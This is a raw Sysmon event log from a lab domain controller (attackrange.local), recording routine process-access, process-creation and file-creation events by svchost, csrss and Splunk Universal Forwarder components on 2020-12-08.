\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85D7-5FCF-0601-000000009101}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.538{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D7-5FCF-0601-000000009101}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:35.539{10ACEC4A-85D7-5FCF-0601-000000009101}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:48.842{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\README.txt2020-12-08 13:55:48.842 11241100x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:48.842{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\LICENSE.txt2020-12-08 13:55:48.842 10341000x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0E01-000000009101}4404C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0E01-000000009101}4404C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.982{10ACEC4A-85E5-5FCF-0D01-000000009101}47082876C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E5-5FCF-0E01-000000009101}4404C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.985{10ACEC4A-85E5-5FCF-0E01-000000009101}4404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E5-5FCF-0D01-000000009101}4708C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E5-5FCF-0D01-000000009101}4708C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.967{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 